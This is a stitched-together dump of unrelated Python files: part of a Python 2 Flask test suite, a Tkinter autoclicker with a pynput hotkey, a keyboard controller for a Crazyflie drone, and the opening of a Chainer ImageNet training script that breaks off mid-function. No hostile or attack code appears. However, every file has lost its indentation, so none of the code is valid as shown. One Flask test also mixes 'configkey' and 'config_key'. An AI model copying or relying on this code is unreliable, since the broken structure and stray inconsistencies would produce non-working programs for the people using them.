buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
ctx = app.test_request_context()
ctx.push()
self.assert_equal(buffer, [])
ctx.pop()
self.assert_equal(buffer, [None])
def test_response_creation(self):
app = flask.Flask(__name__)
@app.route('/unicode')
def from_unicode():
return u'Hällo Wörld'
@app.route('/string')
def from_string():
return u'Hällo Wörld'.encode('utf-8')
@app.route('/args')
def from_tuple():
return 'Meh', 400, {
'X-Foo': 'Testing',
'Content-Type': 'text/plain; charset=utf-8'
}
c = app.test_client()
self.assert_equal(c.get('/unicode').data, u'Hällo Wörld'.encode('utf-8'))
self.assert_equal(c.get('/string').data, u'Hällo Wörld'.encode('utf-8'))
rv = c.get('/args')
self.assert_equal(rv.data, 'Meh')
self.assert_equal(rv.headers['X-Foo'], 'Testing')
self.assert_equal(rv.status_code, 400)
self.assert_equal(rv.mimetype, 'text/plain')
def test_make_response(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response()
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, '')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('Awesome')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data, 'Awesome')
self.assert_equal(rv.mimetype, 'text/html')
rv = flask.make_response('W00t', 404)
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, 'W00t')
self.assert_equal(rv.mimetype, 'text/html')
def test_make_response_with_response_instance(self):
app = flask.Flask(__name__)
with app.test_request_context():
rv = flask.make_response(
flask.jsonify({'msg': 'W00t'}), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data,
'{\n "msg": "W00t"\n}')
self.assertEqual(rv.mimetype, 'application/json')
rv = flask.make_response(
flask.Response(''), 400)
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.data, '')
self.assertEqual(rv.mimetype, 'text/html')
rv = flask.make_response(
flask.Response('', headers={'Content-Type': 'text/html'}),
400, [('X-Foo', 'bar')])
self.assertEqual(rv.status_code, 400)
self.assertEqual(rv.headers['Content-Type'], 'text/html')
self.assertEqual(rv.headers['X-Foo'], 'bar')
def test_url_generation(self):
app = flask.Flask(__name__)
@app.route('/hello/<name>', methods=['POST'])
def hello():
pass
with app.test_request_context():
self.assert_equal(flask.url_for('hello', name='test x'), '/hello/test%20x')
self.assert_equal(flask.url_for('hello', name='test x', _external=True),
'http://localhost/hello/test%20x')
def test_build_error_handler(self):
app = flask.Flask(__name__)
# Test base case, a URL which results in a BuildError.
with app.test_request_context():
self.assertRaises(BuildError, flask.url_for, 'spam')
# Verify the error is re-raised if not the current exception.
try:
with app.test_request_context():
flask.url_for('spam')
except BuildError, error:
pass
try:
raise RuntimeError('Test case where BuildError is not current.')
except RuntimeError:
self.assertRaises(BuildError, app.handle_url_build_error, error, 'spam', {})
# Test a custom handler.
def handler(error, endpoint, values):
# Just a test.
return '/test_handler/'
app.url_build_error_handlers.append(handler)
with app.test_request_context():
self.assert_equal(flask.url_for('spam'), '/test_handler/')
def test_custom_converters(self):
from werkzeug.routing import BaseConverter
class ListConverter(BaseConverter):
def to_python(self, value):
return value.split(',')
def to_url(self, value):
base_to_url = super(ListConverter, self).to_url
return ','.join(base_to_url(x) for x in value)
app = flask.Flask(__name__)
app.url_map.converters['list'] = ListConverter
@app.route('/<list:args>')
def index(args):
return '|'.join(args)
c = app.test_client()
self.assert_equal(c.get('/1,2,3').data, '1|2|3')
def test_static_files(self):
app = flask.Flask(__name__)
rv = app.test_client().get('/static/index.html')
self.assert_equal(rv.status_code, 200)
self.assert_equal(rv.data.strip(), '<h1>Hello World!</h1>')
with app.test_request_context():
self.assert_equal(flask.url_for('static', filename='index.html'),
'/static/index.html')
def test_none_response(self):
app = flask.Flask(__name__)
@app.route('/')
def test():
return None
try:
app.test_client().get('/')
except ValueError, e:
self.assert_equal(str(e), 'View function did not return a response')
pass
else:
self.assert_("Expected ValueError")
def test_request_locals(self):
self.assert_equal(repr(flask.g), '<LocalProxy unbound>')
self.assertFalse(flask.g)
def test_proper_test_request_context(self):
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return None
@app.route('/', subdomain='foo')
def sub():
return None
with app.test_request_context('/'):
self.assert_equal(flask.url_for('index', _external=True), 'http://localhost.localdomain:5000/')
with app.test_request_context('/'):
self.assert_equal(flask.url_for('sub', _external=True), 'http://foo.localhost.localdomain:5000/')
try:
with app.test_request_context('/', environ_overrides={'HTTP_HOST': 'localhost'}):
pass
except Exception, e:
self.assert_(isinstance(e, ValueError))
self.assert_equal(str(e), "the server name provided " +
"('localhost.localdomain:5000') does not match the " + \
"server name from the WSGI environment ('localhost')")
try:
app.config.update(SERVER_NAME='localhost')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost'}):
pass
except ValueError, e:
raise ValueError(
"No ValueError exception should have been raised \"%s\"" % e
)
try:
app.config.update(SERVER_NAME='localhost:80')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost:80'}):
pass
except ValueError, e:
raise ValueError(
"No ValueError exception should have been raised \"%s\"" % e
)
def test_test_app_proper_environ(self):
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return 'Foo'
@app.route('/', subdomain='foo')
def subdomain():
return 'Foo SubDomain'
rv = app.test_client().get('/')
self.assert_equal(rv.data, 'Foo')
rv = app.test_client().get('/', 'http://localhost.localdomain:5000')
self.assert_equal(rv.data, 'Foo')
rv = app.test_client().get('/', 'https://localhost.localdomain:5000')
self.assert_equal(rv.data, 'Foo')
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'https://localhost.localdomain')
self.assert_equal(rv.data, 'Foo')
try:
app.config.update(SERVER_NAME='localhost.localdomain:443')
rv = app.test_client().get('/', 'https://localhost.localdomain')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError, e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " +
"('localhost.localdomain:443') does not match the " + \
"server name from the WSGI environment ('localhost.localdomain')")
try:
app.config.update(SERVER_NAME='localhost.localdomain')
rv = app.test_client().get('/', 'http://foo.localhost')
# Werkzeug 0.8
self.assert_equal(rv.status_code, 404)
except ValueError, e:
# Werkzeug 0.7
self.assert_equal(str(e), "the server name provided " + \
"('localhost.localdomain') does not match the " + \
"server name from the WSGI environment ('foo.localhost')")
rv = app.test_client().get('/', 'http://foo.localhost.localdomain')
self.assert_equal(rv.data, 'Foo SubDomain')
def test_exception_propagation(self):
def apprunner(configkey):
app = flask.Flask(__name__)
@app.route('/')
def index():
1/0
c = app.test_client()
if config_key is not None:
app.config[config_key] = True
try:
resp = c.get('/')
except Exception:
pass
else:
self.fail('expected exception')
else:
self.assert_equal(c.get('/').status_code, 500)
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
def test_max_content_length(self):
app = flask.Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
self.assert_(False)
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
self.assert_(False)
@app.errorhandler(413)
def catcher(error):
return '42'
c = app.test_client()
rv = c.post('/accept', data={'myfile': 'foo' * 100})
self.assert_equal(rv.data, '42')
def test_url_processors(self):
app = flask.Flask(__name__)
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
c = app.test_client()
self.assert_equal(c.get('/de/').data, '/de/about')
self.assert_equal(c.get('/de/about').data, '/foo')
self.assert_equal(c.get('/foo').data, '/en/about')
def test_inject_blueprint_url_defaults(self):
app = flask.Flask(__name__)
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page): pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
self.assert_equal(values, expected)
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
self.assert_equal(url, expected)
def test_debug_mode_complains_after_first_request(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
return 'Awesome'
self.assert_(not app.got_first_request)
self.assert_equal(app.test_client().get('/').data, 'Awesome')
try:
@app.route('/foo')
def broken():
return 'Meh'
except AssertionError, e:
self.assert_('A setup function was called' in str(e))
else:
self.fail('Expected exception')
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
self.assert_equal(app.test_client().get('/foo').data, 'Meh')
self.assert_(app.got_first_request)
def test_before_first_request_functions(self):
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
got.append(42)
c = app.test_client()
c.get('/')
self.assert_equal(got, [42])
c.get('/')
self.assert_equal(got, [42])
self.assert_(app.got_first_request)
def test_routing_redirect_debugging(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with app.test_client() as c:
try:
c.post('/foo', data={})
except AssertionError, e:
self.assert_('http://localhost/foo/' in str(e))
self.assert_('Make sure to directly send your POST-request '
'to this URL' in str(e))
else:
self.fail('Expected exception')
rv = c.get('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, 'success')
app.debug = False
with app.test_client() as c:
rv = c.post('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, 'success')
def test_route_decorator_custom_endpoint(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
c = app.test_client()
self.assertEqual(c.get('/foo/').data, 'foo')
self.assertEqual(c.get('/bar/').data, 'bar')
self.assertEqual(c.get('/bar/123').data, '123')
def test_preserve_only_once(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail')
def fail_func():
1/0
c = app.test_client()
for x in xrange(3):
with self.assert_raises(ZeroDivisionError):
c.get('/fail')
self.assert_(flask._request_ctx_stack.top is not None)
self.assert_(flask._app_ctx_stack.top is not None)
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
self.assert_(flask._request_ctx_stack.top is None)
self.assert_(flask._app_ctx_stack.top is None)
class ContextTestCase(FlaskTestCase):
def test_context_binding(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
@app.route('/meh')
def meh():
return flask.request.url
with app.test_request_context('/?name=World'):
self.assert_equal(index(), 'Hello World!')
with app.test_request_context('/meh'):
self.assert_equal(meh(), 'http://localhost/meh')
self.assert_(flask._request_ctx_stack.top is None)
def test_context_test(self):
app = flask.Flask(__name__)
self.assert_(not flask.request)
self.assert_(not flask.has_request_context())
ctx = app.test_request_context()
ctx.push()
try:
self.assert_(flask.request)
self.assert_(flask.has_request_context())
finally:
ctx.pop()
def test_manual_context_binding(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
ctx = app.test_request_context('/?name=World')
ctx.push()
self.assert_equal(index(), 'Hello World!')
ctx.pop()
try:
index()
except RuntimeError:
pass
else:
self.assert_(0, 'expected runtime error')
class SubdomainTestCase(FlaskTestCase):
def test_basic_support(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/')
def normal_index():
return 'normal index'
@app.route('/', subdomain='test')
def test_index():
return 'test index'
c = app.test_client()
rv = c.get('/', 'http://localhost/')
self.assert_equal(rv.data, 'normal index')
rv = c.get('/', 'http://test.localhost/')
self.assert_equal(rv.data, 'test index')
@emits_module_deprecation_warning
def test_module_static_path_subdomain(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'example.com'
from subdomaintestmodule import mod
app.register_module(mod)
c = app.test_client()
rv = c.get('/static/hello.txt', 'http://foo.example.com/')
self.assert_equal(rv.data.strip(), 'Hello Subdomain')
def test_subdomain_matching(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost/')
self.assert_equal(rv.data, 'index for mitsuhiko')
def test_subdomain_matching_with_ports(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost:3000'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost:3000/')
self.assert_equal(rv.data, 'index for mitsuhiko')
@emits_module_deprecation_warning
def test_module_subdomain_support(self):
app = flask.Flask(__name__)
mod = flask.Module(__name__, 'test', subdomain='testing')
app.config['SERVER_NAME'] = 'localhost'
@mod.route('/test')
def test():
return 'Test'
@mod.route('/outside', subdomain='xtesting')
def bar():
return 'Outside'
app.register_module(mod)
c = app.test_client()
rv = c.get('/test', 'http://testing.localhost/')
self.assert_equal(rv.data, 'Test')
rv = c.get('/outside', 'http://xtesting.localhost/')
self.assert_equal(rv.data, 'Outside')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(BasicFunctionalityTestCase))
suite.addTest(unittest.makeSuite(ContextTestCase))
suite.addTest(unittest.makeSuite(SubdomainTestCase))
return suite
|
main.py
|
from tkinter import *
from tkinter import ttk, messagebox
import pyautogui as pa
import time, threading
from pynput import keyboard
class AutoClicker:
def __init__(self, h, m, s, ms, pos, times, w):
self.time = ms+s*1000+m*60000+h*60*60*1000
self.started = True
self.button = "left"
self.position = pos
self.times = times
self.window = w
def start(self):
while self.started and self.times != 0:
if self.position != None:
pa.click(button=self.button, x=self.position[0], y=self.position[1])
else:
pa.click(button=self.button)
if self.times > 0:
self.times -= 1
time.sleep(self.time/1000)
self.window.stop()
def stop(self):
self.started = False
class Window:
def __init__(self):
self.tk = Tk()
self.tk.title("AutoClicker v1.0")
self.startKey = "c"
self.started = False
def draw_gui(self):
self.interval = LabelFrame(self.tk, text="Click interval")
self.interval.grid(column=0, row=0, columnspan=2, padx=5, pady=5, sticky="ew")
self.h = ttk.Spinbox(self.interval, from_=0, to=24, width=3)
self.h.set(0)
self.h.pack(side="left", pady=5, padx=5)
hL = Label(self.interval, text="hours,")
hL.pack(side="left")
self.m = ttk.Spinbox(self.interval, from_=0, to=59, width=3)
self.m.set(0)
self.m.pack(side="left")
mL = Label(self.interval, text="minutes,")
mL.pack(side="left")
self.s = ttk.Spinbox(self.interval, from_=0, to=59, width=3)
self.s.set(0)
self.s.pack(side="left")
sL = Label(self.interval, text="seconds,")
sL.pack(side="left")
self.ms = ttk.Spinbox(self.interval, from_=0, to=999, width=3)
self.ms.set(0)
self.ms.pack(side="left")
mmL = Label(self.interval, text="milliseconds")
mmL.pack(side="left")
def check_bind_start():
def key_pressed(k):
try:
self.started = True
self.startKey = k.char
self.started = False
return False
except ValueError:
pass
with keyboard.Listener(on_press=key_pressed) as listener:
listener.join()
self.startBindL["text"] = "Start/Stop key: [%s]: " % self.startKey
self.config = LabelFrame(self.tk, text="Key bind")
self.startBindL = Label(self.config, text="Start/Stop key [%s]: " % self.startKey)
self.startBindL.pack(side="left", padx=3, pady=5)
startBindB = Button(self.config, text="Click to bind", command=check_bind_start)
startBindB.pack(side="left", padx=3, pady=5)
self.config.grid(row=1, column=0, padx=5, sticky="w")
self.times = LabelFrame(self.tk, text="Click repeat")
self.repeatType = BooleanVar()
self.repeatType.set(False)
r1 = Radiobutton(self.times, text="Repeat times: ", variable=self.repeatType, value=True)
r2 = Radiobutton(self.times, text="Repeat until stopped", variable=self.repeatType, value=False)
self.timesEntry = Entry(self.times, width=3)
r1.grid(row=0, column=0, sticky="w", padx=3)
self.timesEntry.grid(row=0, sticky="w", column=1, padx=3)
r2.grid(row=1, column=0, sticky="w", padx=3, columnspan=2)
self.times.grid(row=2, column=0, padx=5, sticky = "w")
self.mouseSetting = LabelFrame(self.tk, text="Mouse setting")
mouseButtonL = Label(self.mouseSetting, text="Mouse button: ")
mouseButtonL.pack(padx=3, pady=3)
self.buttonSelect = ttk.Combobox(self.mouseSetting, values=["left", "right"], state="readonly")
self.buttonSelect.set("left")
self.buttonSelect.pack(padx=3, pady=3)
frame = Frame(self.mouseSetting)
x = Label(frame, text="X:", state="disabled")
y = Label(frame, text="Y:", state="disabled")
self.xNum = Entry(frame, width=4, state="disabled")
self.yNum = Entry(frame, width=4, state="disabled")
def onclick():
x["state"] = "normal" if self.var.get() else "disabled"
y["state"] = "normal" if self.var.get() else "disabled"
self.xNum["state"] = "normal" if self.var.get() else "disabled"
self.yNum["state"] = "normal" if self.var.get() else "disabled"
self.var = BooleanVar()
coordsBox = Checkbutton(frame, variable=self.var, text="Specific coords", command=onclick)
x.grid(row=1, column=0)
y.grid(row=2, column=0)
self.xNum.grid(row=1, column=1)
self.yNum.grid(row=2, column=1)
coordsBox.grid(row=0, column=0, columnspan=2)
frame.pack(padx=3, pady=3)
self.mouseSetting.grid(row=1, column=1, padx=5, sticky="e", rowspan=2)
self.startB = Button(self.tk, text="Start", command=self.start)
self.startB.grid(row=3, column=0)
self.stopB = Button(self.tk, text="Stop", command=self.stop, state="disabled")
self.stopB.grid(row=3, column=1, pady=10);
Label(self.tk, text="OrangoMango - https://orangomango.github.io").grid(row=4, column=0, pady=2, columnspan=2)
def handleStartClick():
def key_pressed(k):
try:
if k.char == self.startKey.lower():
if self.started:
self.stop()
else:
self.start()
except AttributeError:
pass
with keyboard.Listener(on_press=key_pressed) as listener:
listener.join()
clickThread = threading.Thread(target=handleStartClick)
clickThread.start()
def start(self):
self.started = True;
try:
hours = int(self.h.get())
minutes = int(self.m.get())
seconds = int(self.s.get())
milliseconds = int(self.ms.get())
except ValueError:
messagebox.showerror("Error", "Please check your values!")
return
if self.var.get():
try:
xC = int(self.xNum.get())
yC = int(self.yNum.get())
pos = (xC, yC)
except ValueError:
messagebox.showerror("Error", "Please check your values!")
return
else:
pos = None
if self.repeatType.get():
try:
times = int(self.timesEntry.get())
except ValueError:
messagebox.showerror("Error", "Please check your values!")
return
else:
times = -1
self.startB.configure(state="disabled")
self.stopB.configure(state="normal");
self.autoclicker = AutoClicker(hours, minutes, seconds, milliseconds, pos, times, self)
self.autoclicker.button = self.buttonSelect.get()
startT = threading.Thread(target=self.autoclicker.start)
startT.start()
def stop(self):
self.started = False
self.autoclicker.stop()
self.startB.configure(state="normal")
self.stopB.configure(state="disabled");
def mainloop(self):
self.tk.mainloop()
if __name__ == "__main__":
window = Window()
window.draw_gui();
window.mainloop()
|
key_control.py
|
import logging
import time
import signal
import sys
import pygame
import sys
import threading
import cflib.crtp
from cflib.crazyflie.syncCrazyflie import SyncCrazyflie
from cflib.crazyflie.log import LogConfig
URI = 'radio://0/80/250K'
def signal_handler(signal, frame):
print("**** Crazyflie Stopping ****")
#land seq
for y in range(10):
cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
time.sleep(0.1)
global done
done = True
close_terminate();
sys.exit(0)
def close_terminate():
try:
cf.commander.send_stop_setpoint()
except Exception as e:
print("Error in stopping: %s" % str(e))
signal.signal(signal.SIGINT, signal_handler)
XY_VEL = 0.25
YAW_RATE = 40
Z_STEP = 0.02
# -1 = first, 0 = neither, 1 = second
upDown = 0
leftRight = 0
forwardBack = 0
yawLeftRight = 0
done = True
active = []
WIDTH = 200
HEIGHT = 100
# runs key checking
def on_key_down(key):
global upDown
global leftRight
global forwardBack
global yawLeftRight
if key in active:
return
# print("PRESSED " + str(key))
active.append(key)
if key == key.W:
# print('Alt Up')
upDown = -1
elif key == key.S:
# print('Alt Down')
upDown = 1
elif key == key.A:
# print('Yaw Left')
yawLeftRight = -1
elif key == key.D:
# print('Yaw Right')
yawLeftRight = 1
elif key == key.UP:
# print('Pitch Forward')
forwardBack = -1
elif key == key.DOWN:
# print('Pitch Back')
forwardBack = 1
elif key == key.LEFT:
# print('Roll Left')
leftRight = -1
elif key == key.RIGHT:
# print('Roll Right')
leftRight = 1
def on_key_up(key):
global upDown
global leftRight
global forwardBack
global yawLeftRight
if key in active:
active.remove(key)
# print("RELEASED " + str(key))
#releasing
if key == key.W or key == key.S:
# print('Release Alt')
upDown = 0
elif key == key.A or key == key.D:
# print('Release Yaw')
yawLeftRight = 0
elif key == key.UP or key == key.DOWN:
# print('Release Pitch')
forwardBack = 0
elif key == key.LEFT or key == key.RIGHT:
# print('Release Roll')
leftRight = 0
cf = None
def main_thread():
ALT = 0.4
VX = 0
VY = 0
YAW = 0
global cf
print("STARTING MAIN")
# Initialize the low-level drivers (don't list the debug drivers)
cflib.crtp.init_drivers(enable_debug_driver=False)
with SyncCrazyflie(URI) as scf:
cf = scf.cf
cf.param.set_value('kalman.resetEstimation', '1')
time.sleep(0.1)
cf.param.set_value('kalman.resetEstimation', '0')
time.sleep(1.5)
print("--------- Initiating Sequence ---------")
for y in range(10):
cf.commander.send_hover_setpoint(0, 0, 0, y * ALT / 10)
time.sleep(0.1)
print("**** Crazyflie in the air! ****")
global done
done = False
while not done:
#ROLL BLOCK
if leftRight == -1:
#left
VY = XY_VEL
elif leftRight == 1:
#right
VY = -XY_VEL
else:
VY = 0
#FORWARD BLOCK
if forwardBack == -1:
#forward
VX = XY_VEL
elif forwardBack == 1:
#back
VX = -XY_VEL
else:
VX = 0
#ALT BLOCK
if upDown == -1:
#up
ALT += Z_STEP
elif upDown == 1:
#down
ALT -= Z_STEP
if ALT < 0.4:
ALT = 0.4
#YAW BLOCK
if yawLeftRight == -1:
#left
YAW = -YAW_RATE
elif yawLeftRight == 1:
#right
YAW = YAW_RATE
else:
YAW = 0
cf.commander.send_hover_setpoint(VX, VY, YAW, ALT)
print("VALS: (VX %.2f, VY %.2f, YAW %.2f, ALT %.2f" % (VX, VY, YAW, ALT))
time.sleep(0.1)
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
# time.sleep(0.1)
#ENDING
#close_terminate()
reader = threading.Thread(target=main_thread)
reader.start()
# done = False
print("STARTING")
# pygame.init()
# pygame.display.set_mode((200, 100))
# while not done:
# for event in pygame.event.get():
# if event.type == pygame.QUIT:
# sys.exit()
# # setting 4 axis
# if event.type == pygame.KEYDOWN:
# if event.key == pygame.K_w:
# print('Alt Up')
# upDown = -1
# elif event.key == pygame.K_s:
# print('Alt Down')
# upDown = 1
# elif event.key == pygame.K_a:
# print('Yaw Left')
# yawLeftRight = -1
# elif event.key == pygame.K_d:
# print('Yaw Right')
# yawLeftRight = 1
# elif event.key == pygame.K_UP:
# print('Pitch Forward')
# forwardBack = -1
# elif event.key == pygame.K_DOWN:
# print('Pitch Back')
# forwardBack = -1
# elif event.key == pygame.K_LEFT:
# print('Roll Left')
# leftRight = -1
# elif event.key == pygame.K_RIGHT:
# print('Roll Right')
# leftRight = 1
# #releasing
# if event.type == pygame.KEYUP:
# if event.key == pygame.K_w or event.key == pygame.K_s:
# print('Release Alt')
# upDown = 0
# elif event.key == pygame.K_a or event.key == pygame.K_d:
# print('Release Yaw')
# yawLeftRight = 0
# elif event.key == pygame.K_UP or event.key == pygame.K_DOWN:
# print('Release Pitch')
# forwardBack = 0
# elif event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
# print('Release Roll')
# leftRight = 0
# #wait til crazy flie is in the air
# while done:
# s = 0
# main = Tk()
# frame = Frame(main, width=200, height=100)
# main.bind_all('<KeyPress>', key_press)
# main.bind_all('<KeyRelease>', key_release)
# frame.pack()
# main.mainloop()
# done = True
# # gui.join()
# print("Direction Reader Closed")
# def signal_handler(signal, frame):
# print("**** Crazyflie Stopping ****")
# #land seq
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
# time.sleep(0.1)
# close_terminate();
# sys.exit(0)
# def close_terminate():
# try:
# cf.commander.send_stop_setpoint()
# log_bat.stop()
# logFile.close()
# except Exception as e:
# print("Error in stopping log: %s" % str(e))
# signal.signal(signal.SIGINT, signal_handler)
# URI = 'radio://0/80/250K'
# # Only output errors from the logging framework
# logging.basicConfig(level=logging.ERROR)
# #assume full to start
# vbat = 4.0
# #somewhat arbitrary
# V_THRESH = 3.13
# def received_bat_data(timestamp, data, logconf):
# global vbat
# #print('[%d][%s]: %f' % (timestamp, logconf.name, float(data['pm.vbat'])))
# vbat = float(data['pm.vbat'])
# def error_bat_data(logconf, msg):
# print('Error when logging %s: %s' % (logconf.name, msg))
# if __name__ == '__main__':
# # Initialize the low-level drivers (don't list the debug drivers)
# cflib.crtp.init_drivers(enable_debug_driver=False)
# with SyncCrazyflie(URI) as scf:
# cf = scf.cf
# cf.param.set_value('kalman.resetEstimation', '1')
# time.sleep(0.1)
# cf.param.set_value('kalman.resetEstimation', '0')
# time.sleep(1.5)
# log_bat = LogConfig(name='Battery', period_in_ms=100)
# log_bat.add_variable('pm.vbat', 'float')
# logFile = open("bat.txt","w+")
# try:
# cf.log.add_config(log_bat)
# # This callback will receive the data
# log_bat.data_received_cb.add_callback(received_bat_data)
# # This callback will be called on errors
# log_bat.error_cb.add_callback(error_bat_data)
# # Start the logging
# log_bat.start()
# except KeyError as e:
# print('Could not start log configuration,'
# '{} not found in TOC'.format(str(e)))
# except AttributeError:
# print('Could not add Battery log config, bad configuration.')
# print("--------- Initiating Sequence ---------")
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, y / 25)
# time.sleep(0.1)
# print("**** Crazyflie in the air! ****")
# while vbat > V_THRESH:
# cf.commander.send_hover_setpoint(0, 0, 0, 10 / 25)
# logFile.write(str(vbat) + "\r\n") # write battery voltage to file
# time.sleep(0.05)
# print("**** Low battery detected -- Landing ****")
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
# time.sleep(0.1)
# #ENDING
# close_terminate()
|
train_imagenet.py
|
#!/usr/bin/env python
"""Example code of learning a large scale convnet from ILSVRC2012 dataset.
Prerequisite: To run this example, crop the center of ILSVRC2012 training and
validation images and scale them to 256x256, and make two lists of space-
separated CSV whose first column is full path to image and second column is
zero-origin label (this format is same as that used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import os
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
import chainer
from chainer import computational_graph
from chainer import cuda
from chainer import optimizers
from chainer import serializers
parser = argparse.ArgumentParser(
description='Learning convnet from ILSVRC2012 dataset')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alex, alexbn, googlenet, googlenetbn)')
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--root', '-r', default='.',
help='Root directory path of image files')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
parser.add_argument('--outstate', '-s', default='state',
help='Path to save optimizer state on each validation')
parser.add_argument('--initmodel', default='',
help='Initialize the model from given file')
parser.add_argument('--resume', default='',
help='Resume the optimization from snapshot')
args = parser.parse_args()
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
assert 50000 % args.val_batchsize == 0
def load_image_list(path, root):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((os.path.join(root, pair[0]), np.int32(pair[1])))
return tuples
# Prepare dataset
train_list = load_image_list(args.train, args.root)
val_list = load_image_list(args.val, args.root)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alex':
import alex
model = alex.Alex()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9)
optimizer.setup(model)
# Init/Resume
if args.initmodel:
print('Load model from', args.initmodel)
serializers.load_hdf5(args.initmodel, model)
if args.resume:
print('Load optimizer state from', args.resume)
serializers.load_hdf5(args.resume, optimizer)
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
